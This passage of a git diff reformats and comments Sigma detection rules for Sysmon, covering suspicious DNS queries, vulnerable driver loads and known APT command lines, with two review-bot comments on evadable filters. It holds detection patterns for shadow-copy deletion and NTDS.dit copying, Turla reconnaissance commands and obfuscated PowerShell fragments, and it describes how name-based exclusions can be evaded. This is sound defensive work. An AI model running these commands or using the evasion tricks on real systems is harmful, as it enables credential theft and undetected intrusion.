CommandLine: - vssadmin.exe Delete Shadows - 'vssadmin create shadow /for=C:' - copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit diff --git a/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml b/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml index ac9e926bb..d8ead3266 100644 --- a/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml +++ b/sigma/sysmon/dns_query/dns_query_win_anonymfiles_com.yml 
@@ -1,11 +1,10 @@ title: DNS Query for Anonfiles.com Domain - Sysmon id: 065cceea-77ec-4030-9052-fc0affea7110 related: - - id: 29f171d7-aa47-42c7-9c7b-3c87938164d9 - type: similar + - id: 29f171d7-aa47-42c7-9c7b-3c87938164d9 + type: similar status: test -description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload - platform often used for malicious purposes +description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: pH-T (Nextron Systems) diff --git a/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml b/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml index cd1997c9a..aca0dec62 100644 --- a/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml +++ b/sigma/sysmon/dns_query/dns_query_win_appinstaller.yml @@ -1,14 +1,11 @@ title: AppX Package Installation Attempts Via AppInstaller.EXE id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a related: - - id: 180c7c5c-d64b-4a63-86e9-68910451bc8b - type: derived + - id: 180c7c5c-d64b-4a63-86e9-68910451bc8b + type: derived status: test -description: 'Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is - the default handler for the "ms-appinstaller" URI. It attempts to load/install - a package from the referenced URL - - ' +description: | + Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL references: - https://twitter.com/notwhickey/status/1333900137232523264 - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ diff --git a/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml b/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml index 0f243b099..e82078c1e 100644 
--- a/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml +++ b/sigma/sysmon/dns_query/dns_query_win_devtunnels_communication.yml @@ -1,17 +1,15 @@ title: DNS Query To Devtunnels Domain id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b related: - - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 - type: similar - - id: 4b657234-038e-4ad5-997c-4be42340bce4 - type: similar - - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 - type: similar + - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels + type: similar + - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode + type: similar + - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode + type: similar status: experimental -description: 'Detects DNS query requests to Devtunnels domains. Attackers can abuse - that feature to establish a reverse shell or persistence on a machine. - - ' +description: | + Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2 - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security diff --git a/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml b/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml index 64f72e837..b29321774 100644 --- a/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml +++ b/sigma/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml @@ -34,8 +34,9 @@ detection: filter_optional_azure: Image|startswith: C:\WindowsAzure\GuestAgent filter_main_null: - Image: null + Image: filter_optional_browsers: + # Note: This list is for browsers installed in the user context. To avoid basic evasions based on image name. Best to baseline this list with the browsers you use internally and add their full paths. Image|endswith: - \chrome.exe - \firefox.exe 
@@ -43,5 +44,6 @@ detection: condition: dns_query and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Likely +# Note: Incrase the level once a baseline is established level: low ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml b/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml index 50ea8b128..be5816914 100644 --- a/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml +++ b/sigma/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml @@ -1,8 +1,7 @@ title: DNS HybridConnectionManager Service Bus id: 7bd3902d-8b8b-4dd4-838a-c6862d40150d status: test -description: Detects Azure Hybrid Connection Manager services querying the Azure service - bus service +description: Detects Azure Hybrid Connection Manager services querying the Azure service bus service references: - https://twitter.com/Cyb3rWard0g/status/1381642789369286662 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -24,7 +23,6 @@ detection: Image|contains: HybridConnectionManager condition: dns_query and selection falsepositives: - - Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus - service + - Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service level: high ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml b/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml index 17b06267b..88e4f5ddc 100644 --- a/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml +++ b/sigma/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml 
@@ -1,11 +1,10 @@ title: Suspicious Cobalt Strike DNS Beaconing - Sysmon id: f356a9c4-effd-4608-bbf8-408afd5cd006 related: - - id: 0d18728b-f5bf-4381-9dcf-915539fff6c2 - type: similar + - id: 0d18728b-f5bf-4381-9dcf-915539fff6c2 + type: similar status: test -description: Detects a program that invoked suspicious DNS queries known from Cobalt - Strike beacons +description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ diff --git a/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml b/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml index 93c7e38eb..e77de6cab 100644 --- a/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml +++ b/sigma/sysmon/dns_query/dns_query_win_mega_nz.yml @@ -1,8 +1,8 @@ title: DNS Query To MEGA Hosting Website id: 613c03ba-0779-4a53-8a1f-47f914a4ded3 related: - - id: 66474410-b883-415f-9f8d-75345a0a66a6 - type: similar + - id: 66474410-b883-415f-9f8d-75345a0a66a6 + type: similar status: test description: Detects DNS queries for subdomains related to MEGA sharing website references: diff --git a/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml b/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml index 52c981222..d916291d1 100644 --- a/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml +++ b/sigma/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml @@ -1,8 +1,8 @@ title: DNS Query Request By Regsvr32.EXE id: 36e037c4-c228-4866-b6a3-48eb292b9955 related: - - id: c7e91a02-d771-4a6d-a700-42587e0b1095 - type: derived + - id: c7e91a02-d771-4a6d-a700-42587e0b1095 + type: derived status: test description: Detects DNS queries initiated by "Regsvr32.exe" references: 
diff --git a/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml b/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml
index 98c78d96e..25ef76abf 100644
--- a/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml
+++ b/sigma/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml
@@ -1,25 +1,17 @@ title: DNS Query To Remote Access Software Domain From Non-Browser App id: 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 related: - - id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f - type: obsoletes - - id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d - type: obsoletes - - id: ed785237-70fa-46f3-83b6-d264d1dc6eb4 - type: obsoletes + - id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f + type: obsoletes + - id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d + type: obsoletes + - id: ed785237-70fa-46f3-83b6-d264d1dc6eb4 + type: obsoletes status: experimental -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows @@ -69,14 +61,14 @@ detection: - logmeincdn.http.internapcdn.net - n-able.com - net.anydesk.com - - netsupportsoftware.com + - netsupportsoftware.com # For NetSupport Manager RAT - parsecusercontent.com - pubsub.atera.com - relay.kaseya.net - relay.screenconnect.com - relay.splashtop.com - remotedesktop-pa.googleapis.com - - remoteutilities.com + - remoteutilities.com # Usage of Remote Utilities RAT - secure.logmeinrescue.com - services.vnc.com - static.remotepc.com @@ -85,9 +77,11 @@ detection: - telemetry.servers.qetqo.com - tmate.io - zohoassist.com - selection_rustdesk: + selection_rustdesk: # https://twitter.com/malmoeb/status/1668504345132822531?s=20 and https://www.adamsdesk.com/posts/rustdesk-not-connecting/ mention this pattern QueryName|endswith: .rustdesk.com QueryName|startswith: rs- + # Exclude browsers for legitimate visits of the domains mentioned above + # Add missing browsers you use and exclude the ones you don't filter_optional_chrome: Image: - C:\Program Files\Google\Chrome\Application\chrome.exe 
@@ -101,11 +95,11 @@ detection: - C:\Program Files (x86)\Internet Explorer\iexplore.exe - C:\Program Files\Internet Explorer\iexplore.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -117,8 +111,8 @@ detection: Image|endswith: \safari.exe filter_optional_defender: Image|endswith: - - \MsMpEng.exe - - \MsSense.exe + - \MsMpEng.exe # Microsoft Defender executable + - \MsSense.exe # Windows Defender Advanced Threat Protection Service Executable filter_optional_brave: Image|endswith: \brave.exe Image|startswith: C:\Program Files\BraveSoftware\ @@ -174,7 +168,6 @@ detection: Image|endswith: \avant.exe condition: dns_query and (1 of selection_* and not 1 of filter_optional_*) falsepositives: - - Likely with other browser software. Apply additional filters for any other browsers - you might use. + - Likely with other browser software. Apply additional filters for any other browsers you might use. level: medium ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml b/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml index a08f884a7..4bc783a2f 100644 --- a/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml +++ b/sigma/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml 
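Review bot: The `filter_optional_defender` exclusion in the `@@ -117,8 +111,8 @@` hunk still matches `\MsMpEng.exe` and `\MsSense.exe` by filename suffix only, so any binary dropped under one of those names in a user-writable directory inherits the exclusion, whereas the browser filters in this same file (`filter_optional_chrome` with full `Image:` paths, `filter_optional_edge_2` with `Image|startswith:`) are anchored to an install location. The two added comments say what the executables are but do not narrow the match. Consider switching this filter to an `Image|startswith:` on the Defender platform directory used in your environment, the way `filter_optional_edge_2` does with `C:\Program Files (x86)\Microsoft\EdgeCore\`; if suffix matching is kept on purpose because that directory is versioned, a comment such as `# Suffix match kept deliberately: platform directory name changes with each Defender update` would record the trade-off.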
@@ -1,8 +1,7 @@ title: Suspicious DNS Query for IP Lookup Service APIs id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 status: test -description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating - from a non browser process. +description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process. references: - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon - https://twitter.com/neonprimetime/status/1436376497980428318 @@ -74,11 +73,11 @@ detection: filter_optional_maxthon: Image|endswith: \maxthon.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ diff --git a/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml b/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml index 530b9d9ae..91f2c98f9 100644 --- a/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml +++ b/sigma/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml 
@@ -1,9 +1,7 @@ title: TeamViewer Domain Query By Non-TeamViewer Application id: 778ba9a8-45e4-4b80-8e3e-34a419f0b85e status: test -description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer - client by an image that isn't named TeamViewer (sometimes used by threat actors - for obfuscation) +description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation) references: - https://www.teamviewer.com/en-us/ author: Florian Roth (Nextron Systems) @@ -25,11 +23,11 @@ detection: - taf.teamviewer.com - udp.ping.teamviewer.com filter_main_teamviewer: + # Note: To avoid evasion based on similar names. Best add full install location of TeamViewer Image|contains: TeamViewer condition: dns_query and (selection and not 1 of filter_main_*) falsepositives: - Unknown binary names of TeamViewer - - Depending on the environment the rule might require some initial tuning before - usage to avoid FP with third party applications + - Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications level: medium ruletype: Sigma diff --git a/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml b/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml index ac5a36039..5e2d4f513 100644 --- a/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml +++ b/sigma/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml @@ -1,8 +1,8 @@ title: DNS Query Tor .Onion Address - Sysmon id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 related: - - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 - type: similar + - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 + type: similar status: experimental description: Detects DNS queries to an ".onion" address related to Tor routing networks references: 
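Review bot: The comment added above `filter_main_teamviewer` describes the evasion but leaves `Image|contains: TeamViewer` unchanged, so the only `filter_main_*` entry in the rule still excludes any image whose full path contains that substring, including a payload run from an attacker-created directory named `TeamViewer`, which is precisely the obfuscation the description says the rule is meant to catch. Because the condition is `selection and not 1 of filter_main_*`, that single substring decides the whole rule. If a path-anchored `Image|startswith:` is not workable for every deployment, the comment should say the substring match is retained knowingly and the `falsepositives` entry `Unknown binary names of TeamViewer` could mention that the cost is evadability rather than noise, e.g. `# Note: substring match is evadable by path naming; replace with Image|startswith on your TeamViewer install directory where possible`.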
diff --git a/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml b/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml
index ea602f0a1..114d0cdce 100644
--- a/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml
+++ b/sigma/sysmon/dns_query/dns_query_win_ufile_io_query.yml
@@ -1,11 +1,10 @@
title: DNS Query To Ufile.io
id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b
related:
- - id: 090ffaad-c01a-4879-850c-6d57da98452d
- type: similar
+ - id: 090ffaad-c01a-4879-850c-6d57da98452d
+ type: similar
status: experimental
-description: Detects DNS queries to "ufile.io", which was seen abused by malware and
- threat actors as a method for data exfiltration
+description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
references:
- https://thedfirreport.com/2021/12/13/diavol-ransomware/
author: yatinwad, TheDFIRReport
@@ -26,7 +25,6 @@ detection:
QueryName|contains: ufile.io
condition: dns_query and selection
falsepositives:
- - DNS queries for "ufile" are not malicious by nature necessarily. Investigate
- the source to determine the necessary actions to take
+ - DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take
level: low
ruletype: Sigma
diff --git a/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml b/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml
index 66f50f215..568a67434 100644
--- a/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml
+++ b/sigma/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml
@@ -1,17 +1,15 @@ title: DNS Query To Visual Studio Code Tunnels Domain id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 related: - - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 - type: similar - - id: 4b657234-038e-4ad5-997c-4be42340bce4 - type: similar - - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b - type: similar + - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels + type: similar + - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode + type: similar + - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels + type: similar status: experimental -description: 'Detects DNS query requests to Visual Studio Code tunnel domains. Attackers - can abuse that feature to establish a reverse shell or persistence on a machine. - - ' +description: | + Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html diff --git a/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml b/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml index 5d3acb8c3..e5afd15fd 100644 --- a/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml +++ b/sigma/sysmon/driver_load/driver_load_win_mal_drivers_names.yml 
@@ -91,10 +91,7 @@ detection:
- \5a4fe297c7d42539303137b6d75b150d.sys
condition: driver_load and selection
falsepositives:
- - False positives may occur if one of the vulnerable driver names mentioned above
- didn't change its name between versions. So always make sure that the driver
- being loaded is the legitimate one and the non vulnerable version.
- - If you experience a lot of FP you could comment the driver name or its exact
- known legitimate location (when possible)
+ - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.
+ - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml b/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml
index a4e5e08bf..d51d1d28d 100644
--- a/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml
+++ b/sigma/sysmon/driver_load/driver_load_win_pua_process_hacker.yml
@@ -1,8 +1,8 @@
title: PUA - Process Hacker Driver Load
id: 67add051-9ee7-4ad3-93ba-42935615ae8d
related:
- - id: 10cb6535-b31d-4512-9962-513dcbc42cc1
- type: similar
+ - id: 10cb6535-b31d-4512-9962-513dcbc42cc1
+ type: similar
status: experimental
description: Detects driver load of the Process Hacker tool
references:
@@ -38,7 +38,6 @@ detection:
- 6E7B34DFC017700B1517B230DF6FF0D0
condition: driver_load and (1 of selection_*)
falsepositives:
- - Legitimate use of process hacker or system informer by developers or system
- administrators
+ - Legitimate use of process hacker or system informer by developers or system administrators
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml b/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml
index d33ee5e31..990ad0a43 100644
--- a/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml
+++ b/sigma/sysmon/driver_load/driver_load_win_pua_system_informer.yml
@@ -1,8 +1,8 @@
title: PUA - System Informer Driver Load
id: 10cb6535-b31d-4512-9962-513dcbc42cc1
related:
- - id: 67add051-9ee7-4ad3-93ba-42935615ae8d
- type: similar
+ - id: 67add051-9ee7-4ad3-93ba-42935615ae8d
+ type: similar
status: experimental
description: Detects driver load of the System Informer tool
references:
@@ -55,7 +55,6 @@ detection:
- 3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138
condition: driver_load and (1 of selection_*)
falsepositives:
- - System Informer is regularly used legitimately by system administrators or developers.
- Apply additional filters accordingly
+ - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml b/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml
index bc231aa80..2198b4a74 100644
--- a/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml
+++ b/sigma/sysmon/driver_load/driver_load_win_susp_temp_use.yml
@@ -21,7 +21,6 @@ detection:
ImageLoaded|contains: \Temp\
condition: driver_load and selection
falsepositives:
- - There is a relevant set of false positives depending on applications in the
- environment
+ - There is a relevant set of false positives depending on applications in the environment
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml b/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml
index fd3bdc4f5..d08405271 100644
--- a/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml
+++ b/sigma/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml
@@ -1,8 +1,7 @@
title: Vulnerable Driver Load By Name
id: 72cd00d6-490c-4650-86ff-1d11f491daa1
status: experimental
-description: Detects the load of known vulnerable drivers via the file name of the
- drivers.
+description: Detects the load of known vulnerable drivers via the file name of the drivers.
references:
- https://loldrivers.io/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -297,10 +296,7 @@ detection:
- \iqvw64e.sys
condition: driver_load and selection
falsepositives:
- - False positives may occur if one of the vulnerable driver names mentioned above
- didn't change its name between versions. So always make sure that the driver
- being loaded is the legitimate one and the non vulnerable version.
- - If you experience a lot of FP you could comment the driver name or its exact
- known legitimate location (when possible)
+ - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.
+ - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)
level: low
ruletype: Sigma
diff --git a/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml b/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml
index 2f7ea46e6..95566e7d9 100644
--- a/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml
+++ b/sigma/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml
@@ -1,9 +1,7 @@
 title: Vulnerable HackSys Extreme Vulnerable Driver Load
 id: 295c9289-acee-4503-a571-8eacaef36b28
 status: test
-description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally
- vulnerable Windows driver developed for security enthusiasts to learn and polish
- their exploitation skills at Kernel level and often abused by threat actors
+description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors
 references:
 - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -24,12 +22,12 @@ detection:
 ImageLoaded|endswith: \HEVD.sys
 selection_sysmon:
 Hashes|contains:
- - IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5
- - IMPHASH=c46ea2e651fd5f7f716c8867c6d13594
+ - IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5 # Version 3.0
+ - IMPHASH=c46ea2e651fd5f7f716c8867c6d13594 # Version 3.0
 selection_other:
 Imphash:
- - f26d0b110873a1c7d8c4f08fbeab89c5
- - c46ea2e651fd5f7f716c8867c6d13594
+ - f26d0b110873a1c7d8c4f08fbeab89c5 # Version 3.0
+ - c46ea2e651fd5f7f716c8867c6d13594 # Version 3.0
 condition: driver_load and (1 of selection*)
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml b/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml
index d68a85c7c..d828c917b 100644
--- a/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml
+++ b/sigma/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml
@@ -1,8 +1,7 @@
 title: Vulnerable WinRing0 Driver Load
 id: 1a42dfa6-6cb2-4df9-9b48-295be477e835
 status: test
-description: Detects the load of a signed WinRing0 driver often used by threat actors,
- crypto miners (XMRIG) or malware for privilege escalation
+description: Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation
 references:
 - https://github.com/xmrig/xmrig/tree/master/bin/WinRing0
 - https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
diff --git a/sigma/sysmon/driver_load/driver_load_win_windivert.yml b/sigma/sysmon/driver_load/driver_load_win_windivert.yml
index 30e5a4014..a8e41f135 100644
--- a/sigma/sysmon/driver_load/driver_load_win_windivert.yml
+++ b/sigma/sysmon/driver_load/driver_load_win_windivert.yml
@@ -1,8 +1,7 @@
 title: WinDivert Driver Load
 id: 679085d5-f427-4484-9f58-1dc30a7c426d
 status: test
-description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection
- package for Windows
+description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
 references:
 - https://reqrypt.org/windivert-doc.html
 - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
@@ -26,6 +25,7 @@ detection:
 ImageLoaded|contains:
 - \WinDivert.sys
 - \WinDivert64.sys
+ # Other used names
 - \NordDivert.sys
 - \lingtiwfp.sys
 - \eswfp.sys
diff --git a/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml b/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml
index 32c116de3..eec70594b 100644
--- a/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml
+++ b/sigma/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml
@@ -26,7 +26,7 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \rundll32.exe
- CommandLine|contains:
+ CommandLine|contains:
 - zxFunction
 - RemoteDiskXXXXX
 condition: process_creation and selection
diff --git a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml
index 04d56ceb7..833342d8e 100644
--- a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml
+++ b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml
@@ -26,7 +26,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine:
+ CommandLine:
 - net use \\\\%DomainController%\C$ "P@ssw0rd" *
 - dir c:\\*.doc* /s
 - dir %TEMP%\\*.exe
diff --git a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml
index 2ed963093..205147a7f 100644
--- a/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml
+++ b/sigma/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml
@@ -23,12 +23,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_cli_1:
- CommandLine|contains:
+ CommandLine|contains:
 - tracert -h 10 yahoo.com
 - .WSqmCons))|iex;
 - Fr`omBa`se6`4Str`ing
